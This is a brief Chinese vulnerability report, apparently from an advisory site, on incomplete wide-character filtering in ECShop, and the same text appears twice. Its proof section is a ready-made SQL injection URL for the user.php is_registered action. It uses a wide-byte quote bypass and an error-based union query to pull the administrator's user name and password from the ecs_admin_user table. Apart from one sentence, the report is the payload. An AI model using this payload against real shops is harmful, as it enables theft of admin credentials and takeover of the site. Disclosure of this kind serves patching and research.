### 简要描述: ### 详细说明: ecshop 对宽字符过滤还是不完整。 ### 漏洞证明: 提下以下参数:http://www.xx.com/user.php?act=is_registered&username=%ce%27%20and%201=1%20union%20select%201%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28Select%20concat%280x5b,user_name,0x3a,password,0x5d%29%20FROM%20ecs_admin_user%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20%23 [<img src="https://images.seebug.org/upload/201209/2015255136e7cbecc9386bd3afc6a95920d5796a.png" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201209/2015255136e7cbecc9386bd3afc6a95920d5796a.png)
### 简要描述: ### 详细说明: ecshop 对宽字符过滤还是不完整。 ### 漏洞证明: 提下以下参数:http://www.xx.com/user.php?act=is_registered&username=%ce%27%20and%201=1%20union%20select%201%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28Select%20concat%280x5b,user_name,0x3a,password,0x5d%29%20FROM%20ecs_admin_user%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20%23 [<img src="https://images.seebug.org/upload/201209/2015255136e7cbecc9386bd3afc6a95920d5796a.png" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201209/2015255136e7cbecc9386bd3afc6a95920d5796a.png)